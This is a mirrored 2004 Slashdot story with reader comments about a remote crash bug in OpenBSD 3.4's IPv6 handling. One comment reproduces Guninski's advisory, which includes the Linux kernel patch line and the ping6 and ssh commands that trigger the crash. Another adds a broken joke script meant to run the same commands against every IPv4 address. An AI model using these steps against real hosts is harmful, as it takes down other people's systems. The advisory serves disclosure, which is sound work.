Slashdot Mirror

← Back to Stories (view on slashdot.org)

Remotely Crash OpenBSD

Posted by CowboyNeal on from the even-the-best-of-us dept.

*no comment* writes "If you are running OpenBSD on your IPv6 install, it might be time to upgrade to -current. (just kidding) There is, however, a way to crash OpenBSD 3.4 with a couple of simple IPv6 commands. Georgi Guninski, found the problem. To quote Theo, 'it is just a crash.'" It is unknown if the bug could be used to execute arbitrary code, but it does require patching a Linux kernel (or rolling your own network stack) to exploit.

64 of 407 comments (clear)

  1. Oh well... by Seoulstriker · · Score: 5, Funny

    I think it's time to upgrade to windows.

    --
    I am defenseless. Use your button. Mod me down with all of your hatred.
    1. Re:Oh well... by phoenix_rizzen · · Score: 5, Informative

      Nope. Microsft bought the STREAMS implementation of TCP/IP from Spyder, Inc.

      The only TCP/IP-related bits MS took from BSD were a few utilities like ftp.exe and telnet.exe. The actual TCP/IP stack is not related to BSD in any way.

    2. Re:Oh well... by NanoGator · · Score: 4, Funny

      "Upgrade what,... maybe... your stress level???"

      Vice City relieves that.

      --
      "Derp de derp."
    3. Re:Oh well... by kl76 · · Score: 4, Interesting

      Who the heck is Spyder Inc? The TCP/IP stack in NT 3.1 was the STREAMS-based SpiderTCP 6 (IIRC) from Spider Systems Ltd. (I used to work for them). This in turn used some BSD code. This stack was replaced in NT 3.5, with a stack alledgedly written from scratch at Microsoft according to this .

    4. Re:Oh well... by HalliS · · Score: 5, Funny
      • I think it's time to upgrade to windows.


      Wrong. The openbsd people obviously included this "crash feature" just so that windows people could feel at home with OpenBSD. I think it's time for Windows folks to switch to OpenBSD.
      --


      My other UID is 1337
  2. Does this count? by DNAspark99 · · Score: 5, Interesting

    Or can OpenBSD still boast "Only one remote hole in the default install, in more than 7 years!" ?

    --

    --
    Society has traditionally always tried to find scapegoats for its problems. Well, here I am.
    1. Re:Does this count? by inertia187 · · Score: 5, Insightful

      I don't think the IPv6 install is the default. Even if it is, 'it's just a crash' not a remote hole. So, yes they can still boast.

      --
      A programmer is a machine for converting coffee into code.
    2. Re:Does this count? by Richard_at_work · · Score: 5, Interesting

      IPv6 is available in the base install, but you have to actually have an IPv6 address assigned that people can get to to exploit this issue. Its really a non issue for the 99% of people running OpenBSD out there, but for some, like myself, its time to upgrade.

    3. Re:Does this count? by timeOday · · Score: 3, Insightful
      Guess it depends on how you define "hole."

      Personally I don't like random people crashing my servers, so I'd call it a hole!

    4. Re:Does this count? by Nimrangul · · Score: 3, Informative
      I recall this vaguely, that was only able to crash sshd on an recent OpenBSD box, it was exploitable on other platforms (though older OpenBSDs would have been equally vulnerable).

      Not only that, but for those blaming OpenSSH for making bad code that created the exploit, it was one that had been present since ossh (the free ssh implementation the OpenBSD team used to make OpenSSH).

      --
      I'm sick of following my dreams - I'm just going to ask them where they're going and hook up with them later.
    5. Re:Does this count? by kkenn · · Score: 5, Informative

      There have actually been a number of local and remote root holes in the default install of OpenBSD during that time frame..the only sense in which their claim is true is that they don't count root holes except in the head of the CVS tree. If a release from a year ago had the hole, but the current tree does not, they don't count it.

      For example, a couple of years ago there was a telnetd exploit discovered after OpenBSD had disabled telnetd by default in OpenBSD-current, but a recent prior release had shipped with telnetd enabled. That allowed them to rationalize not counting it as a remote hole. There are a number of other similar examples.

    6. Re:Does this count? by edhall · · Score: 2, Insightful

      Just because they fixed it before it was reported doesn't mean it never existed -- or that it was never quietly exploited. This sort of semantic game detracts from the hard work that goes into OpenBSD. It may be no worse than the sort of word games used to market other software, but in an area like security where trust is paramount it needlessly raises suspicion.

      -Ed
    7. Re:Does this count? by Anonymous Coward · · Score: 2, Insightful

      It does to me because that's how it's always been done with OBSD. Look, when someone says something, you have the opinion and right to look at the veracity or underlying premise of -what- is being said. It's been pretty clear for a couple of years what OBSD's standard for that statement is.

      iow, if it doesn't make sense to you, that's completely fine. But it's not like OBSD is being hush hush, nudge wink with how they come up with their count.

      imnsho, at least they have a standard or policy or rules or what have you for determining their remote hole count. Of all other OS makers, groups, and mfgs out there, I don't know of one other that keeps count, has a public statement of that count, gives publicly accessible rules for determining that count, and follows those rules. Linux sure doesn't--the sheer variation, number of distros, etc. has no one keeping a firm count. OBSD is more limited and applies it to their default install.

      Personally, I like OBSD's claim and think it's valid, both in the areas of valid to make and valid as valuable to the OS user.

      Compare them to other OS makers. When MS releases a security patch and months later, Melissa or some other virus comes along and exploits it because people were too lazy to plug up their systems, I don't say "That's MS's fault." I consider that on incompetent or lazy users. Now, I realize many here on this forum will blame MS, and they do get boatloads of blame, but they also patched the damn thing. Sometimes with these patches, the patch itself reveals the error and makes it widely known; virus or exploit writers then go about taking advantage of that, comparing differences between a patched and unpatched systems.

      When Samba had that "caught in the wild" ecurity issue last year, I don't say "well that's been in the wild 5 years" and then count that one bug multiple times against them for every Samba version released since then, or every update. Why not? Because that would be ludicrous. Likewise with OBSD, I don't say "well, that was out there since release X when Y code was added, hence that counts for every release since X until current as a bug".

      Note with the last, this also reveals that people and communities innately have their own idea or standards on how "bugs" are counted against to versions or releases. Most people would say Samba's bug they caught in the wild counts as 1 bug. And they'd be right. Not several via very Samba release since that code was written.

      Same with OBSD. They have a standard, they found an issue, so does it apply to their policy for determining that count? No. Count doesn't go up.

  3. Double standards? by Threni · · Score: 5, Insightful

    I'm thinking that if someone from Microsoft stated "It's just a crash" the editors here would be just a touch more sarcastic...

    1. Re:Double standards? by Anonymous Coward · · Score: 5, Funny

      if someone from Microsoft stated "It's just a crash"

      Yeah, but on Windows, how can you tell the difference?

      (Admit it, you asked for it)

    2. Re:Double standards? by jwthompson2 · · Score: 2, Insightful

      "It's Just a crash" is among the dumbest things anyone could say about a bug. Not quite as bad as "It's just a remote root exploit" but very disturbing none the less. The only thing that seems to offer any reassurance is that it requires a patched kernel or custom stack to exploit but a person bent on bringing down a system *could* do these things without too much trouble I would think. My question is for a serious cracker wouldn't taking down a system in a manner like this be much more inviting if all they want to do is bring a system down?

      --
      Even if I knew that tomorrow the world would go to pieces, I would still plant my apple tree. -Martin Luther
    3. Re:Double standards? by gid13 · · Score: 2, Insightful

      If Microsoft had few enough exploits that they had a security record worth protecting by saying "it's just a crash", perhaps the editors wouldn't feel it necessary to be so sarcastic?

      Especially given that Microsoft is a company that charges for their product, where OpenBSD is free.

    4. Re:Double standards? by spitzak · · Score: 4, Insightful

      He IS being sarcastic. If this was a Microsoft bug and they said "It's just a crash" it surely would be quoted exactly the same way, because it is a silly statement. Let's see:

      *no comment* writes "If you are IPv6 on WinXP, it might be time to upgrade to Linux (just kidding). There is, however, a way to crash WinXP with a couple of simple IPv6 commands. Georgi Guninski, found the problem. To quote Bill Gates, 'it is just a crash.'" It is unknown if the bug could be used to execute arbitrary code, but it does require patching a Linux kernel (or rolling your own network stack) to exploit.

      Okay, now that the wording has been changed to Microsoft, doesn't it suddenly look like a typical rabid-anti-Microsoft Slashdot article? You are so blinded by the belief that everything is anti-Microsoft that you cannot even see people being sarcastic about anything not Microsoft!

  4. Re:Remotely? by Beolach · · Score: 4, Informative

    No, in order to perform an attack on an OpenBSD box with this vulnerability you need to patch a Linux Kernel or roll your own network stack.

    --
    Join moola.com, play games to earn money.
  5. Patch for production systems? by agentZ · · Score: 5, Interesting

    I know that the problem has been fixed in -current, but I run a production box that I refuse to bring up to -current. There's no patch or even a mention of this problem on the errata page.

    What's a sane admin to do?

    1. Re:Patch for production systems? by Richard_at_work · · Score: 4, Informative

      Give it a little time. THey usually patch -current first to test it out, then backport the patches to -stable. Patching -current first saves time in the long run, in cases like this where its not really a MS level issue :) IF it was more serious, -stable would get the patch first, and then it would be ported into -current.

    2. Re:Patch for production systems? by Anonymous Coward · · Score: 3, Informative

      It's been patched in -current for 3 days now.

    3. Re:Patch for production systems? by Ryvar · · Score: 4, Interesting

      Do what I did last night before I even knew about this - comment IPV6 completely out of your kernel entirely for effiency's sake.

      One of the reasons OpenBSD tends to be more secure is because it ships with *almost* everything off. However, there's a solid 10+ default user accounts, 3-4 default services (sshd, sendmail, inetd/portmap), and 75+ kernal/device options you should remove/recompile out upon installation (this is all assuming your only purpose is to create an x86-based router).

      Yes, you'll need to muck about with /etc/mtree/special and /var/cron/tabs a bit to keep everything from whining to syslog constantly, but every unnecessary thing removed is a potential exploit avoided.

      --Ryv

    4. Re:Patch for production systems? by Ryvar · · Score: 3, Interesting

      Smart.

      If I setup the system for mail - which I don't do for a simple firewall - I also use Postfix. Only other alternative is qmail and DJB's stuff is just too much of a PITA/non-standard.

      --Ryv

  6. Re:Remotely? by athakur999 · · Score: 4, Informative

    No, the ATTACKER has to patch their Linux kernel in order to attack you. So if I knew you were running OpenBSD and using IPv6 and knew your IP address, I could patch my kernel and then try to connect to your box, causing you to crash.

    --
    "People that quote themselves in their signatures bother me" - athakur999
  7. Re:patching a Linux kernel? by Roofus · · Score: 4, Informative

    They are saying that to exploit would require a patch to the Linux kernel.

    I like your way better though!

  8. RTFA by Anonymous Coward · · Score: 5, Informative

    You have to have a modified ipv6 stack in order to exploit this bug, not to fix it. I can remotely crash your ipv6 enabled openbsd if I modify my linux kernel. Capisce?

  9. Slashdotted by Anonymous Coward · · Score: 5, Informative

    Remote openbsd crash with ip6, yet still openbsd much better than windows

    Systems affected:
    tested on openbsd 3.4
    not clear about netbsd
    freebsd not vulnerable

    Risk: Medium
    Date: 4 February 2004

    Legal Notice:
    This Advisory is Copyright (c) 2004 Georgi Guninski.
    You may distribute it unmodified.
    You may not modify it and distribute it or distribute parts
    of it without the author's written permission - this especially applies to
    so called "vulnerabilities databases" and securityfocus, microsoft, cert
    and mitre.
    If you want to link to this content use the URL:
    http://www.guninski.com/obsdmtu.html
    Anythi ng in this document may change without notice.

    Disclaimer:
    The information in this advisory is believed to be true though
    it may be false.
    The opinions expressed in this advisory and program are my own and
    not of any company. The usual standard disclaimer applies,
    especially the fact that Georgi Guninski is not liable for any damages
    caused by direct or indirect use of the information or functionality
    provided by this advisory or program. Georgi Guninski bears no
    responsibility for content or misuse of this advisory or program or
    any derivatives thereof.

    Description:
    It is possible to remotely crash openbsd 3.4 if the host receives icmpv6
    and there is a listening tcp port.
    quoting de raadt: "it is just a crash."
    remote crash which screws the kernel.
    unknown whether this may be exploited for code execution.

    Details:
    The problem is triggered by setting small ipv6 mtu and then doing tcp
    connect.
    How to reproduce:
    Patch linux kernel 2.4.24 net/ipv6/icmp.c :

    case ICMPV6_ECHO_REPLY: /* we coulnd't care less */
    icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev); //joro

    then:
    ping6 openbsd
    ssh -6 openbsd

    Workaround:
    It is believed that openbsd current is not vulnerable.
    netbsd current also seems to have related changes.
    check:
    http://www.openbsd.org/cgi-bin/cvsweb/src/sys/neti net6/ip6_output.c
    http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/netine t/tcp_output.c?sortby=date

    Vendor status:
    open, net and free bsd were notified Sun, 1 Feb 2004 16:35:56 +0200

    Georgi Guninski
    http://www.guninski.com

    1. Re:Slashdotted by cgenman · · Score: 2, Funny

      His server is running on OpenBSD. It is only a matter of time before some smart a$$ crashes it.

      --
      The ______ Agenda
  10. Crash or Slash? by Halthar · · Score: 5, Funny

    Great, now when I try and check the linked article and cant get there I am left wondering if it was Slashdotted or if someone crashed the servers using the exploit.

    Hell, who knows, maybe this one is Google's fault too.

  11. So this is why... by Tomy · · Score: 4, Funny

    ...my BSD is dying...

  12. Re:Oh wow by lxs · · Score: 4, Insightful

    I'd rather have a box crashed than a box rooted. But maybe I'm just funny that way.

  13. What are the chances.... by Anonymous Coward · · Score: 2, Funny

    Now let's see ... what are the chances of finding both an OpenBSD server (an unpatched one at that) and IPv6 network in the same place? I think I'd better stick to plausible worries like lighting strikes, seatbelt failures, and choking to death on my turkey dinners.

  14. Re:Remotely? by 0racle · · Score: 3, Informative

    You appear to be missing the whole problem.

    This is a problem with OpenBSD's IPv6 implimentation where if you send bad data, it looks like sending something larger then expected, then the kernel will crap out on you.

    The rolling your own kernel OR build your wn network stack is whats required for the REMOTE host to send these bad packets to your system and crash it.

    On an unrelated note, its a little disturbing to see this as i just rebooted a OBSD 3.3 system to upgrade to 3.4, but then again, I don't run IPv6.

    What I would say is most suspect is Theo's reaction "Its just a crash." You would hope someone who started a project to create the worlds most secure OS would actually care there might be a problem.

    --
    "I use a Mac because I'm just better than you are."
  15. It's only a crash....fun with python by Anonymous Coward · · Score: 3, Funny

    Hey but is only a crash nothing at all to worry about...

    Patch linux kernel 2.4.24 net/ipv6/icmp.c :

    case ICMPV6_ECHO_REPLY: /* we coulnd't care less */
    icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev); //joro

    then:
    ping6 openbsd
    ssh -6 openbsd

    #!/usr/bin/python
    import popen2,string

    def cmd_execute(cmd):
    p = popen2.Popen3(cmd)
    p.wait()
    return string.strip(p.fromchild.read())

    #kill everybody
    for a in range(0,255):
    for b in range(0,255):
    for c in range(0,255):
    for d in range(0,255):
    execute('ping6 ' + a + '.' + b + '.' + c + '.' + d)
    execute('ssh -6 ' + a + '.' + b + '.' + c + '.' + d)

    1. Re:It's only a crash....fun with python by pHDNgell · · Score: 2, Informative

      How is this funny? Pinging IPv4 address with IPv6? If you're going to make a joke, at least get it right.

      --
      -- The world is watching America, and America is watching TV.
  16. about ipv6 by MrLint · · Score: 4, Interesting

    Not log ago there was an article about not only how ipv6 isnt needed, but that since its 'new' code, it has a lot of problems that have long since been worked out of ipv4. Is this an example of that? Should we worry?

    I have to ask myself that with all of the decades of experience that has gone into ipv4 development and hacking and exploiting, are these fears justified? Have all the glitches in ipv4 been found? and if so isnt it trivial to avoid the same early mistakes in ipv6. Does this particular problem have a ipv4 analog? Is it even a stack theory issue? Is it just an implementation oversight?

    Does anyone have any insight?

    1. Re:about ipv6 by burns210 · · Score: 2, Insightful

      ipv6 is a must-upgrade solution... it IS newer code, it does get rid of NAT(which is partially used for security) and ipv4 DOES have some hacks to make it scale higher... however, once all of china connects to the net, all of india, all of everyone, there just physically isn't enough. And NAT just ins't a clean solution when used with private addressing, it works, but it is a hack to an unavoidable fix.

      ipv6 has security built into it, more addresses then particles in the universe, and eliminates the need for private addressing and nat... we should move to ipv6 if for no other reason than it is a cleaner, better solution to internet addressing.

    2. Re:about ipv6 by Tim+the+Gecko · · Score: 3, Informative
      No major backbones carry IPv4 tunneled over IPv6. You might be thinking of MPLS which is present in a lot of backbone networks.

      It's hard to believe there is 'heavy' use of IPv6 when the dedicated IPv6 exchange in the UK peaks at 4Mbit/s of traffic and the LINX exchange in London has >30Gbit/s of IPv4 traffic

      https://lg.ipv6.btexact.com/lgmrtg/hopper-day.html

      http://www.linx.net/tools/stats/index.thtml

  17. Re:do FreeBSD & OpenBSD use the same kernel? by cant_get_a_good_nick · · Score: 3, Informative

    No. They use very different kernels, though a lot of code is shared among them.

  18. It's called selective quoting by Flower · · Score: 5, Insightful
    Without seeing Theo's complete statement you can't tell if the statement is dismissive (something I find difficult to believe) or if it is qualifying - i.e. the exploit only produces a crash.

    Fwiw, I wouldn't go into riot mode over four monosyllable words taken out of context be it from MS or OBSD. Of course, this is /. and that nice little blurb will most certainly cause a lot of banner hits as people will just have to comment. I can personally attest to 3 to get this post up.

    --
    I don't want knowledge. I want certainty. - Law, David Bowie
  19. Re:Maybe not... by Zebedeu · · Score: 2, Funny
    Note: I am not an OpenBSD apologist... I am a Mac apologist.

    Steve?
    Now now, don't be so hard on yourself, we don't really think it's necessary to apologise :)

  20. "Crash" vs. "Root Exploit" by billstewart · · Score: 4, Insightful
    Yes, it's disturbing, but only because it happened, not because Theo's clueless. But the point of such a comment is that "It's NOT a root exploit". By contrast, with Microsoft, major exploits happen Too Frequently and crashes happen too often to bother reporting.

    A non-serious cracker might have fun taking down OpenBSD a few times with an exploit like this. A more serious cracker would do this to try to convince some number of systems to stop running the most secure OS that's reasonably available and replace it with more vulnerable systems that aren't getting spanked a lot.

    --

    Bill Stewart
    New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks
  21. Re:Maybe time to drop this "securitier than thou" by ScottSpeaks! · · Score: 5, Insightful

    I'd find the OpenBSD crew's haughty "more secure than thou" attitude a lot more annoying if it weren't for the fact that their track record actually justifies it. The fact that you can still count the number of remote exploits using a two-bit register is pretty impressive.

  22. Re:Maybe time to drop this "securitier than thou" by Richard_at_work · · Score: 4, Insightful

    yes, when I saw this and noticed people commenting on the "Securer than tho" stance taken, my immediate thought was

    "Hmm, well if we have gotten to the point where people have to roll their own net stack or patch a kernel to bring an issue to the for, then hasnt hte OpenBSD project succeeded in its goal?"

  23. Seems like "Just an incorrect size handling" by loconet · · Score: 2, Informative

    I'm glad they fixed it..

    http://www.openbsd.org/cgi-bin/cvsweb/src/sys/ne ti net6/ip6_output.c.diff?r1=1.81&r2=1.82&f=h
    http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/neti ne t/tcp_output.c.diff?r1=1.106&r2=1.107&sortby=date& f=h

    --
    [alk]
  24. Re:OpenBSD crashes: how could it have been prevent by Penguinshit · · Score: 4, Funny


    The good thing about ports is that, due to their alcohol and tannin content, you *CAN* leave them open much longer than more typical wines. I have a nice port (Fonseca) sitting open on my bar at home. I take a couple of nips from it every evening, and then replace the glass stopper on the carafe. It is a wonderful way to end the work-day. Go grab yourself a 10-year Tawny and you'll see what I mean.

    You do need to be careful with how many ports you have open. I find after a couple of ports my work product increases. After a few more, it tends to decrease, exponentially going downhill with each subsequent port. You need to be especially careful with a root prompt and several open ports late at night.

    For extra kicks, blind taste a Tawny against a Madeira.

    Enjoy.

    --

    I have something in common with Stephen Hawking...

  25. Re:Oh wow by mr_death · · Score: 3, Funny

    My ip address is 127.0.0.1. Knock yourself out.

    --
    It's Linux, damnit! Pay no attention to renaming attempts by self-aggrandizing blowhards.
  26. already fixed!!! by BigBadDude · · Score: 5, Informative

    now, how many times does this happens to your favorite OS vendor and their favorite web browser???

    from the openbsd CVS:
    Revision 1.82 / (download) - annotate - [selected], Wed Feb 4 08:47:41 2004 UTC (38 hours, 50 minutes ago) by itojun
    Branch: MAIN
    CVS Tags: HEAD
    Changes since 1.81: +100 -18 lines
    Diff to previous 1.81 (colored)
    strictly follow RFC2460 section 5, last paragraph (sender behavior when path MTU 1280). bug found by Georgi Guninski. ok dhartmei

  27. Track record by AvantLegion · · Score: 5, Insightful
    I'm thinking that if someone from Microsoft stated "It's just a crash" the editors here would be just a touch more sarcastic...

    The day Microsoft has half the kind of security track record as OpenBSD, they'll be cut some slack.

    OpenBSD had earned a little slack. MS still has a long way to go in system security/stability before they deserve the same treatment.

  28. and the linux zealots cried out by ShadowRage · · Score: 3, Funny

    "our linux crashed your openbsd!"

  29. Re:Cowboyneil needs to check his head by Crimson+Midget · · Score: 3, Informative

    First of all it's CowboyNeal.
    Secondly, there's nothing wrong with his statement. In order to exploit the bug, you need to be running a patched Linux kernel to send the necessary packet.

  30. Re:Oh wow by gpinzone · · Score: 4, Funny

    Wow! You've got a ton of porn on there!

  31. Re:Oh wow by Nimrangul · · Score: 5, Insightful

    What crackpipe have you been using? It must greatly enhance the smoking experience. The funding was not pulled "pulled moments before it was to be paid," the funds were already greatly used. There was about three months left before the funding from POSSE was ended. Theo does not seem like an ass to me, he does instead seem like someone that dismisses stupid shit that random people say because he has better things to do.

    --
    I'm sick of following my dreams - I'm just going to ask them where they're going and hook up with them later.
  32. Re:Just a crash? Crash == DoS, no? by wirelessbuzzers · · Score: 2, Interesting

    I thought Theo's comment sounded really arrogant, too. But you might note that the author quoted it with no context, so who knows whether it was in real life.

    Now as for Microsoft, if MS patched something within... no, wait, it was patched before the bug came out... anyway, we'd cut them a bit more slack.

    --
    I hereby place the above post in the public domain.
  33. What Theo really said.... by One+Louder · · Score: 4, Funny



    To quote Theo, 'it is just a wardrobe malfunction.'"

  34. Why does "remote hole" == elevation of privilege? by xswl0931 · · Score: 5, Insightful

    A "remote hole" doesn't have to just be obtaining root access. Being able to remotely crash a server is almost as bad. So no, they cannot boast.

  35. Mod Parent Humor-Impaired Down Please by Tomy · · Score: 3, Funny


    Troll?!? It was humor, you insensitive clod.

  36. Re:Maybe time to drop this "securitier than thou" by DeltaSigma · · Score: 2, Interesting

    What I've been wondering is if anyone has read any of the literature regarding OpenBSD's methodology. I recally it being expressly mentioned that they would rather have the machine crash than have it rooted. Which is a good idea if you cannot risk a break-in. They try to break-in, you crash, and now you're in a more secure state (off) than you were when they attacked you.

  37. Just a crash.. by fven · · Score: 4, Insightful

    As a sysadmin of a college network, "just a crash" *really* helped me.

    I replaced all firewalls with OpenBSD filtering bridges. One rather persistent script kiddie (unfortuneately a legitimite $luser on the network) decided to send a few malformed packets here, there and everywhere. One of these crashed the filtering bridge at the edge of that particular subnet.

    Immediately no packets enter or leave that subnet and I get about 40 phone calls "the internet is broken / my session crashed..." and go and deal with it.

    Just a crash, saved several boxes. By contrast, accessible linux machines, privelege escalation - root exploit. All over.

    Now if only the average windows box would *only* bluescreen in response to being cracked/ infection with the latest...rather than sending mal packets everywhere. Then infection would be self limiting and the world would be a better place.

  38. And spyder inc. got their stack from by konmaskisin · · Score: 4, Funny

    a complete clean room implementation using engineers that didn't read BSD TCP/IP code in school ...

    yeah right ...

  39. Re:IPv7? by weicco · · Score: 2, Insightful

    Maybe because 6 bytes can't fit in address field which length is 4 bytes, you would trash the option-field or data :P

    --
    You don't know what you don't know.
  40. Re:You are a moron. by hdw · · Score: 2, Informative

    I beg to differ.

    Removing unused features/services/functions does add to your overall security and system stability.

    If you don't use IPv6 then taking it out of your kernel is a good move.

    But I agree to a point, just rampaging thru you kernel config removing fluff isn't security.
    Done in a sane way it's an addition to security and stability.
    // hdw

    --
    Executive Pope (small) Kallisti Engineering
  41. Re:Maybe time to drop this "securitier than thou" by tiger99 · · Score: 2, Insightful
    Tha analogy would be the way the press treat road and rail accidents. In the UK (BTW no passengers at all were killed in crashes last year) it is headline news for weeks, and then again all through the inevitable pubilc enquiry if 4 people are killed in a train crash, yet IIRC on the same day, or maybe the bnext day as 4 were killed in the crash I am thinking of, at least 10 died on the roads, 6 in one vehicle. That one got a small paragraph.... The average is 10 a day in the UK on the roads, about 2 or 3 per year in trains.

    Now the specialist press, including web sites, who know of the existence of OpenBSD, are likely to treat this in much the same way. A BSD crash, any variant, is a rarity, 1000 times or more less likely to happen than a BSOD. Same sort of ratio fro security holes also. So, the same thing happens, the uncommon major event gets the attention, although it does far, far less harm overall than the very common everyday event.

    Of course in this case the normal press remain in utter ignorance, some of them may know that Windoze is not the same as a MAC, a few will know of Linux, and very few indeed will know what BSD is, they probably think it is a shorter abbreviation for BSOD. So, the mainstream press will leave this well alone.

    It is quite right and proper that crashes should be reported, and certainly it is only fair that a problem with a secure OS gets to be known, and fixed, but like the train crash, it needs to be kept in perspective.

    I know that Theo allegedly has an attitude problem, however those who extrapolate from his remark that it is only a crash to suggest that he does not care are IMHO quite wrong. I think he was only putting the event in its true perspective, as being of slightly less importance than a security breach. I think he does care, very much, that "his" software works properly, that is what drives such people, who could earn much more financial reward elsewhere.

    All of this is a matter of seeing the thing in its true perspective. If people did that, no-one at all would use the products of the Convicted Monopolist, and the world would be a very much safer place as regards computer security, and much more productive because there would probably be only one crash for 1000 or even 1000000 BSODs in inferior systems, which are riddled with fundamental design errors.